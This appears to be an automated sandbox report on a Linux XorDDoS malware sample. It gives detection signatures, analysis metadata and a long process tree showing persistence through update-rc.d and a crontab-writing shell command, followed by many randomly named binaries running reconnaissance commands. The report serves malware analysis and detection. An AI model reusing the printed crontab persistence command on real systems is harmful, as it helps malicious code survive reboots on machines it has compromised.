Loading ...

Play interactive tourEdit tour

Linux Analysis Report 4ljhdTTyiA

Overview

General Information

Sample Name:4ljhdTTyiA
Analysis ID:450972
MD5:349456ecaa1380a142f15810a8260378
SHA1:02dd15ecdeedefd7a2f82ba0df38703a74489af3
SHA256:0f00c2e074c6284c556040012ef23357853ccac4ad1373d1dea683562dc24bca
Tags:elfxorddos
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected XorDDoS Bot
Detected non-DNS traffic on DNS port
Drops files in suspicious directories
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample deletes itself
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using cron
Drops files with innocent-looking names
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
PID-file does not contain an ASCII number
Reads CPU information from /proc indicative of miner or evasive malware
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version:33.0.0 White Diamond
Analysis ID:450972
Start date:20.07.2021
Start time:00:23:09
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 45s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:4ljhdTTyiA
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.lin@0/21@5/0
Warnings:
Show All
  • VT rate limit hit for: ww.gzcfr5axf7.com

Process Tree

  • system is lnxubuntu1
  • 4ljhdTTyiA (PID: 4551, Parent: 4475, MD5: 349456ecaa1380a142f15810a8260378) Arguments: /tmp/4ljhdTTyiA
    • 4ljhdTTyiA New Fork (PID: 4554, Parent: 4551)
      • 4ljhdTTyiA New Fork (PID: 4578, Parent: 4554)
        • update-rc.d (PID: 4580, Parent: 4578, MD5: e9e125904f9ed8ff4c8504a55a149005) Arguments: /usr/bin/perl /usr/sbin/update-rc.d 4ljhdTTyiA defaults
          • insserv (PID: 4609, Parent: 4580, MD5: unknown) Arguments: /usr/lib/insserv/insserv 4ljhdTTyiA
          • systemctl (PID: 4646, Parent: 4580, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl daemon-reload
      • dash (PID: 4590, Parent: 4554, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • dash New Fork (PID: 4592, Parent: 4590)
        • sed (PID: 4592, Parent: 4590, MD5: unknown) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • 4ljhdTTyiA New Fork (PID: 4655, Parent: 4554)
        • jjltawydwf (PID: 4656, Parent: 4655, MD5: 8031cb3d4fe5ba13e55be0286e251729) Arguments: /usr/bin/jjltawydwf "ls -la" 4554
      • 4ljhdTTyiA New Fork (PID: 4666, Parent: 4554)
        • jjltawydwf (PID: 4667, Parent: 4666, MD5: 8031cb3d4fe5ba13e55be0286e251729) Arguments: /usr/bin/jjltawydwf "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 4677, Parent: 4554)
        • jjltawydwf (PID: 4678, Parent: 4677, MD5: 8031cb3d4fe5ba13e55be0286e251729) Arguments: /usr/bin/jjltawydwf "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 4688, Parent: 4554)
        • jjltawydwf (PID: 4689, Parent: 4688, MD5: 8031cb3d4fe5ba13e55be0286e251729) Arguments: /usr/bin/jjltawydwf "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 4699, Parent: 4554)
        • jjltawydwf (PID: 4700, Parent: 4699, MD5: 8031cb3d4fe5ba13e55be0286e251729) Arguments: /usr/bin/jjltawydwf pwd 4554
      • 4ljhdTTyiA New Fork (PID: 4713, Parent: 4554)
        • ouhdchrbdz (PID: 4714, Parent: 4713, MD5: 464ee2d18facafa159f9948ab174135c) Arguments: /usr/bin/ouhdchrbdz sh 4554
      • 4ljhdTTyiA New Fork (PID: 4724, Parent: 4554)
        • ouhdchrbdz (PID: 4725, Parent: 4724, MD5: 464ee2d18facafa159f9948ab174135c) Arguments: /usr/bin/ouhdchrbdz whoami 4554
      • 4ljhdTTyiA New Fork (PID: 4735, Parent: 4554)
        • ouhdchrbdz (PID: 4736, Parent: 4735, MD5: 464ee2d18facafa159f9948ab174135c) Arguments: /usr/bin/ouhdchrbdz "echo \"find\"" 4554
      • 4ljhdTTyiA New Fork (PID: 4746, Parent: 4554)
        • ouhdchrbdz (PID: 4747, Parent: 4746, MD5: 464ee2d18facafa159f9948ab174135c) Arguments: /usr/bin/ouhdchrbdz "netstat -antop" 4554
      • 4ljhdTTyiA New Fork (PID: 4757, Parent: 4554)
        • ouhdchrbdz (PID: 4758, Parent: 4757, MD5: 464ee2d18facafa159f9948ab174135c) Arguments: /usr/bin/ouhdchrbdz "grep \"A\"" 4554
      • 4ljhdTTyiA New Fork (PID: 4768, Parent: 4554)
        • fcxqfstrdm (PID: 4769, Parent: 4768, MD5: e45d3c3ceb20cb21cecdf27abb364096) Arguments: /usr/bin/fcxqfstrdm "netstat -an" 4554
      • 4ljhdTTyiA New Fork (PID: 4779, Parent: 4554)
        • fcxqfstrdm (PID: 4780, Parent: 4779, MD5: e45d3c3ceb20cb21cecdf27abb364096) Arguments: /usr/bin/fcxqfstrdm uptime 4554
      • 4ljhdTTyiA New Fork (PID: 4790, Parent: 4554)
        • fcxqfstrdm (PID: 4791, Parent: 4790, MD5: e45d3c3ceb20cb21cecdf27abb364096) Arguments: /usr/bin/fcxqfstrdm pwd 4554
      • 4ljhdTTyiA New Fork (PID: 4801, Parent: 4554)
        • fcxqfstrdm (PID: 4802, Parent: 4801, MD5: e45d3c3ceb20cb21cecdf27abb364096) Arguments: /usr/bin/fcxqfstrdm bash 4554
      • 4ljhdTTyiA New Fork (PID: 4812, Parent: 4554)
        • fcxqfstrdm (PID: 4813, Parent: 4812, MD5: e45d3c3ceb20cb21cecdf27abb364096) Arguments: /usr/bin/fcxqfstrdm ifconfig 4554
      • 4ljhdTTyiA New Fork (PID: 4823, Parent: 4554)
        • dxeguomyxc (PID: 4824, Parent: 4823, MD5: 066caa157c95faa9d8d81929f8157d3a) Arguments: /usr/bin/dxeguomyxc "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 4834, Parent: 4554)
        • dxeguomyxc (PID: 4835, Parent: 4834, MD5: 066caa157c95faa9d8d81929f8157d3a) Arguments: /usr/bin/dxeguomyxc "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 4845, Parent: 4554)
        • dxeguomyxc (PID: 4846, Parent: 4845, MD5: 066caa157c95faa9d8d81929f8157d3a) Arguments: /usr/bin/dxeguomyxc "netstat -an" 4554
      • 4ljhdTTyiA New Fork (PID: 4856, Parent: 4554)
        • dxeguomyxc (PID: 4857, Parent: 4856, MD5: 066caa157c95faa9d8d81929f8157d3a) Arguments: /usr/bin/dxeguomyxc top 4554
      • 4ljhdTTyiA New Fork (PID: 4867, Parent: 4554)
        • dxeguomyxc (PID: 4868, Parent: 4867, MD5: 066caa157c95faa9d8d81929f8157d3a) Arguments: /usr/bin/dxeguomyxc ls 4554
      • 4ljhdTTyiA New Fork (PID: 4878, Parent: 4554)
        • ctrygxclrx (PID: 4879, Parent: 4878, MD5: 039a6eceafdbf298ac52c2a12463d087) Arguments: /usr/bin/ctrygxclrx su 4554
      • 4ljhdTTyiA New Fork (PID: 4889, Parent: 4554)
        • ctrygxclrx (PID: 4890, Parent: 4889, MD5: 039a6eceafdbf298ac52c2a12463d087) Arguments: /usr/bin/ctrygxclrx "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 4900, Parent: 4554)
        • ctrygxclrx (PID: 4901, Parent: 4900, MD5: 039a6eceafdbf298ac52c2a12463d087) Arguments: /usr/bin/ctrygxclrx "netstat -an" 4554
      • 4ljhdTTyiA New Fork (PID: 4911, Parent: 4554)
        • ctrygxclrx (PID: 4912, Parent: 4911, MD5: 039a6eceafdbf298ac52c2a12463d087) Arguments: /usr/bin/ctrygxclrx "grep \"A\"" 4554
      • 4ljhdTTyiA New Fork (PID: 4922, Parent: 4554)
        • ctrygxclrx (PID: 4923, Parent: 4922, MD5: 039a6eceafdbf298ac52c2a12463d087) Arguments: /usr/bin/ctrygxclrx "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 4933, Parent: 4554)
        • gqczobuacc (PID: 4934, Parent: 4933, MD5: c098c27688a125d5cfa970ae835e1eda) Arguments: /usr/bin/gqczobuacc "grep \"A\"" 4554
      • 4ljhdTTyiA New Fork (PID: 4944, Parent: 4554)
        • gqczobuacc (PID: 4945, Parent: 4944, MD5: c098c27688a125d5cfa970ae835e1eda) Arguments: /usr/bin/gqczobuacc "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 4955, Parent: 4554)
        • gqczobuacc (PID: 4956, Parent: 4955, MD5: c098c27688a125d5cfa970ae835e1eda) Arguments: /usr/bin/gqczobuacc su 4554
      • 4ljhdTTyiA New Fork (PID: 4966, Parent: 4554)
        • gqczobuacc (PID: 4967, Parent: 4966, MD5: c098c27688a125d5cfa970ae835e1eda) Arguments: /usr/bin/gqczobuacc "netstat -an" 4554
      • 4ljhdTTyiA New Fork (PID: 4977, Parent: 4554)
        • gqczobuacc (PID: 4978, Parent: 4977, MD5: c098c27688a125d5cfa970ae835e1eda) Arguments: /usr/bin/gqczobuacc "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 4988, Parent: 4554)
        • uoewtvxqdd (PID: 4989, Parent: 4988, MD5: 39aa00025c468148f76c1297ae9e076e) Arguments: /usr/bin/uoewtvxqdd "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 4999, Parent: 4554)
        • uoewtvxqdd (PID: 5000, Parent: 4999, MD5: 39aa00025c468148f76c1297ae9e076e) Arguments: /usr/bin/uoewtvxqdd gnome-terminal 4554
      • 4ljhdTTyiA New Fork (PID: 5010, Parent: 4554)
        • uoewtvxqdd (PID: 5011, Parent: 5010, MD5: 39aa00025c468148f76c1297ae9e076e) Arguments: /usr/bin/uoewtvxqdd ifconfig 4554
      • 4ljhdTTyiA New Fork (PID: 5021, Parent: 4554)
        • uoewtvxqdd (PID: 5022, Parent: 5021, MD5: 39aa00025c468148f76c1297ae9e076e) Arguments: /usr/bin/uoewtvxqdd id 4554
      • 4ljhdTTyiA New Fork (PID: 5032, Parent: 4554)
        • uoewtvxqdd (PID: 5033, Parent: 5032, MD5: 39aa00025c468148f76c1297ae9e076e) Arguments: /usr/bin/uoewtvxqdd "route -n" 4554
      • 4ljhdTTyiA New Fork (PID: 5043, Parent: 4554)
        • rlyjyybyum (PID: 5044, Parent: 5043, MD5: 0713019b4738a770e7b6e1a45b02c8d9) Arguments: /usr/bin/rlyjyybyum "route -n" 4554
      • 4ljhdTTyiA New Fork (PID: 5054, Parent: 4554)
        • rlyjyybyum (PID: 5055, Parent: 5054, MD5: 0713019b4738a770e7b6e1a45b02c8d9) Arguments: /usr/bin/rlyjyybyum "grep \"A\"" 4554
      • 4ljhdTTyiA New Fork (PID: 5065, Parent: 4554)
        • rlyjyybyum (PID: 5066, Parent: 5065, MD5: 0713019b4738a770e7b6e1a45b02c8d9) Arguments: /usr/bin/rlyjyybyum "ls -la" 4554
      • 4ljhdTTyiA New Fork (PID: 5076, Parent: 4554)
        • rlyjyybyum (PID: 5077, Parent: 5076, MD5: 0713019b4738a770e7b6e1a45b02c8d9) Arguments: /usr/bin/rlyjyybyum "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 5087, Parent: 4554)
        • rlyjyybyum (PID: 5088, Parent: 5087, MD5: 0713019b4738a770e7b6e1a45b02c8d9) Arguments: /usr/bin/rlyjyybyum "cd /etc" 4554
      • 4ljhdTTyiA New Fork (PID: 5100, Parent: 4554)
        • tjdqviitkh (PID: 5101, Parent: 5100, MD5: c2561c3afe2388b8727667fcefb207b7) Arguments: /usr/bin/tjdqviitkh "netstat -antop" 4554
      • 4ljhdTTyiA New Fork (PID: 5111, Parent: 4554)
        • tjdqviitkh (PID: 5112, Parent: 5111, MD5: c2561c3afe2388b8727667fcefb207b7) Arguments: /usr/bin/tjdqviitkh "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 5122, Parent: 4554)
        • tjdqviitkh (PID: 5123, Parent: 5122, MD5: c2561c3afe2388b8727667fcefb207b7) Arguments: /usr/bin/tjdqviitkh "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 5133, Parent: 4554)
        • tjdqviitkh (PID: 5134, Parent: 5133, MD5: c2561c3afe2388b8727667fcefb207b7) Arguments: /usr/bin/tjdqviitkh who 4554
      • 4ljhdTTyiA New Fork (PID: 5144, Parent: 4554)
        • tjdqviitkh (PID: 5145, Parent: 5144, MD5: c2561c3afe2388b8727667fcefb207b7) Arguments: /usr/bin/tjdqviitkh "route -n" 4554
      • 4ljhdTTyiA New Fork (PID: 5155, Parent: 4554)
        • aspbnnkmso (PID: 5156, Parent: 5155, MD5: 1d6fd0eb72068b2c5f4c00b6bd4ccce7) Arguments: /usr/bin/aspbnnkmso top 4554
      • 4ljhdTTyiA New Fork (PID: 5166, Parent: 4554)
        • aspbnnkmso (PID: 5167, Parent: 5166, MD5: 1d6fd0eb72068b2c5f4c00b6bd4ccce7) Arguments: /usr/bin/aspbnnkmso whoami 4554
      • 4ljhdTTyiA New Fork (PID: 5177, Parent: 4554)
        • aspbnnkmso (PID: 5178, Parent: 5177, MD5: 1d6fd0eb72068b2c5f4c00b6bd4ccce7) Arguments: /usr/bin/aspbnnkmso "route -n" 4554
      • 4ljhdTTyiA New Fork (PID: 5188, Parent: 4554)
        • aspbnnkmso (PID: 5189, Parent: 5188, MD5: 1d6fd0eb72068b2c5f4c00b6bd4ccce7) Arguments: /usr/bin/aspbnnkmso bash 4554
      • 4ljhdTTyiA New Fork (PID: 5199, Parent: 4554)
        • aspbnnkmso (PID: 5200, Parent: 5199, MD5: 1d6fd0eb72068b2c5f4c00b6bd4ccce7) Arguments: /usr/bin/aspbnnkmso sh 4554
      • 4ljhdTTyiA New Fork (PID: 5210, Parent: 4554)
        • lgnmbyzzlq (PID: 5211, Parent: 5210, MD5: 54d3b5b40db4c72ead6a4d36581f0413) Arguments: /usr/bin/lgnmbyzzlq bash 4554
      • 4ljhdTTyiA New Fork (PID: 5221, Parent: 4554)
        • lgnmbyzzlq (PID: 5222, Parent: 5221, MD5: 54d3b5b40db4c72ead6a4d36581f0413) Arguments: /usr/bin/lgnmbyzzlq "sleep 1" 4554
      • 4ljhdTTyiA New Fork (PID: 5232, Parent: 4554)
        • lgnmbyzzlq (PID: 5233, Parent: 5232, MD5: 54d3b5b40db4c72ead6a4d36581f0413) Arguments: /usr/bin/lgnmbyzzlq "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 5243, Parent: 4554)
        • lgnmbyzzlq (PID: 5244, Parent: 5243, MD5: 54d3b5b40db4c72ead6a4d36581f0413) Arguments: /usr/bin/lgnmbyzzlq bash 4554
      • 4ljhdTTyiA New Fork (PID: 5254, Parent: 4554)
        • lgnmbyzzlq (PID: 5255, Parent: 5254, MD5: 54d3b5b40db4c72ead6a4d36581f0413) Arguments: /usr/bin/lgnmbyzzlq ifconfig 4554
      • 4ljhdTTyiA New Fork (PID: 5265, Parent: 4554)
        • nyavevzqtw (PID: 5266, Parent: 5265, MD5: 98476f6b14264275e728579e9462e596) Arguments: /usr/bin/nyavevzqtw "netstat -antop" 4554
      • 4ljhdTTyiA New Fork (PID: 5276, Parent: 4554)
        • nyavevzqtw (PID: 5277, Parent: 5276, MD5: 98476f6b14264275e728579e9462e596) Arguments: /usr/bin/nyavevzqtw "cat resolv.conf" 4554
      • 4ljhdTTyiA New Fork (PID: 5287, Parent: 4554)
        • nyavevzqtw (PID: 5288, Parent: 5287, MD5: 98476f6b14264275e728579e9462e596) Arguments: /usr/bin/nyavevzqtw "ls -la" 4554
      • 4ljhdTTyiA New Fork (PID: 5298, Parent: 4554)
        • nyavevzqtw (PID: 5299, Parent: 5298, MD5: 98476f6b14264275e728579e9462e596) Arguments: /usr/bin/nyavevzqtw "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 5309, Parent: 4554)
        • nyavevzqtw (PID: 5310, Parent: 5309, MD5: 98476f6b14264275e728579e9462e596) Arguments: /usr/bin/nyavevzqtw "echo \"find\"" 4554
      • 4ljhdTTyiA New Fork (PID: 5320, Parent: 4554)
        • tstbdpivhl (PID: 5321, Parent: 5320, MD5: 383e0852639ec4d6a14747fa2d30695a) Arguments: /usr/bin/tstbdpivhl "echo \"find\"" 4554
      • 4ljhdTTyiA New Fork (PID: 5331, Parent: 4554)
        • tstbdpivhl (PID: 5332, Parent: 5331, MD5: 383e0852639ec4d6a14747fa2d30695a) Arguments: /usr/bin/tstbdpivhl "netstat -antop" 4554
      • 4ljhdTTyiA New Fork (PID: 5342, Parent: 4554)
        • tstbdpivhl (PID: 5343, Parent: 5342, MD5: 383e0852639ec4d6a14747fa2d30695a) Arguments: /usr/bin/tstbdpivhl "netstat -antop" 4554
      • 4ljhdTTyiA New Fork (PID: 5353, Parent: 4554)
        • tstbdpivhl (PID: 5354, Parent: 5353, MD5: 383e0852639ec4d6a14747fa2d30695a) Arguments: /usr/bin/tstbdpivhl "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 5364, Parent: 4554)
        • tstbdpivhl (PID: 5365, Parent: 5364, MD5: 383e0852639ec4d6a14747fa2d30695a) Arguments: /usr/bin/tstbdpivhl uptime 4554
      • 4ljhdTTyiA New Fork (PID: 5375, Parent: 4554)
        • lndoiatrux (PID: 5376, Parent: 5375, MD5: 95dd8784b1ea342ebf09b13bd11667c3) Arguments: /usr/bin/lndoiatrux pwd 4554
      • 4ljhdTTyiA New Fork (PID: 5386, Parent: 4554)
        • lndoiatrux (PID: 5387, Parent: 5386, MD5: 95dd8784b1ea342ebf09b13bd11667c3) Arguments: /usr/bin/lndoiatrux id 4554
      • 4ljhdTTyiA New Fork (PID: 5397, Parent: 4554)
        • lndoiatrux (PID: 5398, Parent: 5397, MD5: 95dd8784b1ea342ebf09b13bd11667c3) Arguments: /usr/bin/lndoiatrux id 4554
      • 4ljhdTTyiA New Fork (PID: 5408, Parent: 4554)
        • lndoiatrux (PID: 5409, Parent: 5408, MD5: 95dd8784b1ea342ebf09b13bd11667c3) Arguments: /usr/bin/lndoiatrux "cd /etc" 4554
      • 4ljhdTTyiA New Fork (PID: 5419, Parent: 4554)
        • lndoiatrux (PID: 5420, Parent: 5419, MD5: 95dd8784b1ea342ebf09b13bd11667c3) Arguments: /usr/bin/lndoiatrux "grep \"A\"" 4554
      • 4ljhdTTyiA New Fork (PID: 5430, Parent: 4554)
        • nefhkhnwwh (PID: 5431, Parent: 5430, MD5: e4786d4b6ed08079c7dbfc4c2ec6de77) Arguments: /usr/bin/nefhkhnwwh whoami 4554
      • 4ljhdTTyiA New Fork (PID: 5441, Parent: 4554)
        • nefhkhnwwh (PID: 5442, Parent: 5441, MD5: e4786d4b6ed08079c7dbfc4c2ec6de77) Arguments: /usr/bin/nefhkhnwwh bash 4554
      • 4ljhdTTyiA New Fork (PID: 5452, Parent: 4554)
        • nefhkhnwwh (PID: 5453, Parent: 5452, MD5: e4786d4b6ed08079c7dbfc4c2ec6de77) Arguments: /usr/bin/nefhkhnwwh id 4554
      • 4ljhdTTyiA New Fork (PID: 5463, Parent: 4554)
        • nefhkhnwwh (PID: 5464, Parent: 5463, MD5: e4786d4b6ed08079c7dbfc4c2ec6de77) Arguments: /usr/bin/nefhkhnwwh uptime 4554
      • 4ljhdTTyiA New Fork (PID: 5474, Parent: 4554)
        • nefhkhnwwh (PID: 5475, Parent: 5474, MD5: e4786d4b6ed08079c7dbfc4c2ec6de77) Arguments: /usr/bin/nefhkhnwwh top 4554
      • 4ljhdTTyiA New Fork (PID: 5485, Parent: 4554)
        • bjhmdsecwa (PID: 5486, Parent: 5485, MD5: 179709d6a3905142c0aab9fed64966d1) Arguments: /usr/bin/bjhmdsecwa pwd 4554
      • 4ljhdTTyiA New Fork (PID: 5496, Parent: 4554)
        • bjhmdsecwa (PID: 5497, Parent: 5496, MD5: 179709d6a3905142c0aab9fed64966d1) Arguments: /usr/bin/bjhmdsecwa ifconfig 4554
      • 4ljhdTTyiA New Fork (PID: 5507, Parent: 4554)
        • bjhmdsecwa (PID: 5508, Parent: 5507, MD5: 179709d6a3905142c0aab9fed64966d1) Arguments: /usr/bin/bjhmdsecwa "ifconfig eth0" 4554
      • 4ljhdTTyiA New Fork (PID: 5518, Parent: 4554)
        • bjhmdsecwa (PID: 5519, Parent: 5518, MD5: 179709d6a3905142c0aab9fed64966d1) Arguments: /usr/bin/bjhmdsecwa whoami 4554
      • 4ljhdTTyiA New Fork (PID: 5529, Parent: 4554)
        • bjhmdsecwa (PID: 5530, Parent: 5529, MD5: 179709d6a3905142c0aab9fed64966d1) Arguments: /usr/bin/bjhmdsecwa "route -n" 4554
      • 4ljhdTTyiA New Fork (PID: 5540, Parent: 4554)
        • otvvhyamws (PID: 5541, Parent: 5540, MD5: afaa93e460bc8ebfe6da8922820dbe8c) Arguments: /usr/bin/otvvhyamws pwd 4554
      • 4ljhdTTyiA New Fork (PID: 5551, Parent: 4554)
        • otvvhyamws (PID: 5552, Parent: 5551, MD5: afaa93e460bc8ebfe6da8922820dbe8c) Arguments: /usr/bin/otvvhyamws pwd 4554
      • 4ljhdTTyiA New Fork (PID: 5562, Parent: 4554)
        • otvvhyamws (PID: 5563, Parent: 3310, MD5: afaa93e460bc8ebfe6da8922820dbe8c) Arguments: /usr/bin/otvvhyamws ifconfig 4554
      • 4ljhdTTyiA New Fork (PID: 5564, Parent: 4554)
        • otvvhyamws (PID: 5566, Parent: 3310, MD5: afaa93e460bc8ebfe6da8922820dbe8c) Arguments: /usr/bin/otvvhyamws uptime 4554
      • 4ljhdTTyiA New Fork (PID: 5567, Parent: 4554)
        • otvvhyamws (PID: 5569, Parent: 3310, MD5: afaa93e460bc8ebfe6da8922820dbe8c) Arguments: /usr/bin/otvvhyamws pwd 4554
      • 4ljhdTTyiA New Fork (PID: 5595, Parent: 4554)
        • aysistkyqn (PID: 5596, Parent: 3310, MD5: abb1b08513a6baa1a5ca70f8e8a23677) Arguments: /usr/bin/aysistkyqn top 4554
      • 4ljhdTTyiA New Fork (PID: 5597, Parent: 4554)
        • aysistkyqn (PID: 5599, Parent: 3310, MD5: abb1b08513a6baa1a5ca70f8e8a23677) Arguments: /usr/bin/aysistkyqn who 4554
      • 4ljhdTTyiA New Fork (PID: 5600, Parent: 4554)
        • aysistkyqn (PID: 5602, Parent: 3310, MD5: abb1b08513a6baa1a5ca70f8e8a23677) Arguments: /usr/bin/aysistkyqn id 4554
      • 4ljhdTTyiA New Fork (PID: 5603, Parent: 4554)
        • aysistkyqn (PID: 5607, Parent: 3310, MD5: abb1b08513a6baa1a5ca70f8e8a23677) Arguments: /usr/bin/aysistkyqn uptime 4554
      • 4ljhdTTyiA New Fork (PID: 5609, Parent: 4554)
        • aysistkyqn (PID: 5613, Parent: 3310, MD5: abb1b08513a6baa1a5ca70f8e8a23677) Arguments: /usr/bin/aysistkyqn "route -n" 4554
      • 4ljhdTTyiA New Fork (PID: 5650, Parent: 4554)
        • flwslywqdx (PID: 5651, Parent: 3310, MD5: 85b9832fbe6c561a27e180098bcc2d2d) Arguments: /usr/bin/flwslywqdx uptime 4554
      • 4ljhdTTyiA New Fork (PID: 5652, Parent: 4554)
        • flwslywqdx (PID: 5654, Parent: 3310, MD5: 85b9832fbe6c561a27e180098bcc2d2d) Arguments: /usr/bin/flwslywqdx "echo \"find\"" 4554
      • 4ljhdTTyiA New Fork (PID: 5655, Parent: 4554)
        • flwslywqdx (PID: 5658, Parent: 3310, MD5: 85b9832fbe6c561a27e180098bcc2d2d) Arguments: /usr/bin/flwslywqdx "echo \"find\"" 4554
      • 4ljhdTTyiA New Fork (PID: 5659, Parent: 4554)
        • flwslywqdx (PID: 5663, Parent: 3310, MD5: 85b9832fbe6c561a27e180098bcc2d2d) Arguments: /usr/bin/flwslywqdx bash 4554
      • 4ljhdTTyiA New Fork (PID: 5666, Parent: 4554)
        • flwslywqdx (PID: 5670, Parent: 3310, MD5: 85b9832fbe6c561a27e180098bcc2d2d) Arguments: /usr/bin/flwslywqdx ls 4554
      • 4ljhdTTyiA New Fork (PID: 5707, Parent: 4554)
        • neofzderab (PID: 5708, Parent: 3310, MD5: 4977aa9ca0c4cf0221d478f9c33e3603) Arguments: /usr/bin/neofzderab gnome-terminal 4554
      • 4ljhdTTyiA New Fork (PID: 5709, Parent: 4554)
        • neofzderab (PID: 5711, Parent: 3310, MD5: 4977aa9ca0c4cf0221d478f9c33e3603) Arguments: /usr/bin/neofzderab "cat resolv.conf" 4554
      • 4ljhdTTyiA New Fork (PID: 5712, Parent: 4554)
        • neofzderab (PID: 5715, Parent: 3310, MD5: 4977aa9ca0c4cf0221d478f9c33e3603) Arguments: /usr/bin/neofzderab "grep \"A\"" 4554
      • 4ljhdTTyiA New Fork (PID: 5717, Parent: 4554)
        • neofzderab (PID: 5721, Parent: 3310, MD5: 4977aa9ca0c4cf0221d478f9c33e3603) Arguments: /usr/bin/neofzderab "route -n" 4554
      • 4ljhdTTyiA New Fork (PID: 5723, Parent: 4554)
        • neofzderab (PID: 5727, Parent: 3310, MD5: 4977aa9ca0c4cf0221d478f9c33e3603) Arguments: /usr/bin/neofzderab uptime 4554
      • 4ljhdTTyiA New Fork (PID: 5762, Parent: 4554)
        • yxfexdyggl (PID: 5763, Parent: 3310, MD5: 65d28de64b4e47691c455f46f858dde0) Arguments: /usr/bin/yxfexdyggl bash 4554
      • 4ljhdTTyiA New Fork (PID: 5764, Parent: 4554)
        • yxfexdyggl (PID: 5766, Parent: 3310, MD5: 65d28de64b4e47691c455f46f858dde0) Arguments: /usr/bin/yxfexdyggl "ls -la" 4554
      • 4ljhdTTyiA New Fork (PID: 5767, Parent: 4554)
        • yxfexdyggl (PID: 5771, Parent: 3310, MD5: 65d28de64b4e47691c455f46f858dde0) Arguments: /usr/bin/yxfexdyggl "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 5773, Parent: 4554)
        • yxfexdyggl (PID: 5776, Parent: 3310, MD5: 65d28de64b4e47691c455f46f858dde0) Arguments: /usr/bin/yxfexdyggl whoami 4554
      • 4ljhdTTyiA New Fork (PID: 5778, Parent: 4554)
        • yxfexdyggl (PID: 5781, Parent: 3310, MD5: 65d28de64b4e47691c455f46f858dde0) Arguments: /usr/bin/yxfexdyggl ls 4554
      • 4ljhdTTyiA New Fork (PID: 5817, Parent: 4554)
        • taocfwkdjv (PID: 5818, Parent: 3310, MD5: b7659826f0d46cf792bcbec586317518) Arguments: /usr/bin/taocfwkdjv sh 4554
      • 4ljhdTTyiA New Fork (PID: 5819, Parent: 4554)
        • taocfwkdjv (PID: 5821, Parent: 3310, MD5: b7659826f0d46cf792bcbec586317518) Arguments: /usr/bin/taocfwkdjv "ls -la" 4554
      • 4ljhdTTyiA New Fork (PID: 5822, Parent: 4554)
        • taocfwkdjv (PID: 5825, Parent: 3310, MD5: b7659826f0d46cf792bcbec586317518) Arguments: /usr/bin/taocfwkdjv "netstat -antop" 4554
      • 4ljhdTTyiA New Fork (PID: 5826, Parent: 4554)
        • taocfwkdjv (PID: 5829, Parent: 3310, MD5: b7659826f0d46cf792bcbec586317518) Arguments: /usr/bin/taocfwkdjv whoami 4554
      • 4ljhdTTyiA New Fork (PID: 5833, Parent: 4554)
        • taocfwkdjv (PID: 5836, Parent: 3310, MD5: b7659826f0d46cf792bcbec586317518) Arguments: /usr/bin/taocfwkdjv "netstat -an" 4554
      • 4ljhdTTyiA New Fork (PID: 5872, Parent: 4554)
        • vhplhrsffz (PID: 5873, Parent: 3310, MD5: 69a4d0c17bfefe7041a1eebc0e21c128) Arguments: /usr/bin/vhplhrsffz "netstat -an" 4554
      • 4ljhdTTyiA New Fork (PID: 5874, Parent: 4554)
        • vhplhrsffz (PID: 5876, Parent: 3310, MD5: 69a4d0c17bfefe7041a1eebc0e21c128) Arguments: /usr/bin/vhplhrsffz id 4554
      • 4ljhdTTyiA New Fork (PID: 5877, Parent: 4554)
        • vhplhrsffz (PID: 5879, Parent: 3310, MD5: 69a4d0c17bfefe7041a1eebc0e21c128) Arguments: /usr/bin/vhplhrsffz "ps -ef" 4554
      • 4ljhdTTyiA New Fork (PID: 5880, Parent: 4554)
        • vhplhrsffz (PID: 5883, Parent: 3310, MD5: 69a4d0c17bfefe7041a1eebc0e21c128) Arguments: /usr/bin/vhplhrsffz whoami 4554
      • 4ljhdTTyiA New Fork (PID: 5885, Parent: 4554)
        • vhplhrsffz (PID: 5889, Parent: 3310, MD5: 69a4d0c17bfefe7041a1eebc0e21c128) Arguments: /usr/bin/vhplhrsffz "netstat -an" 4554
      • 4ljhdTTyiA New Fork (PID: 5927, Parent: 4554)
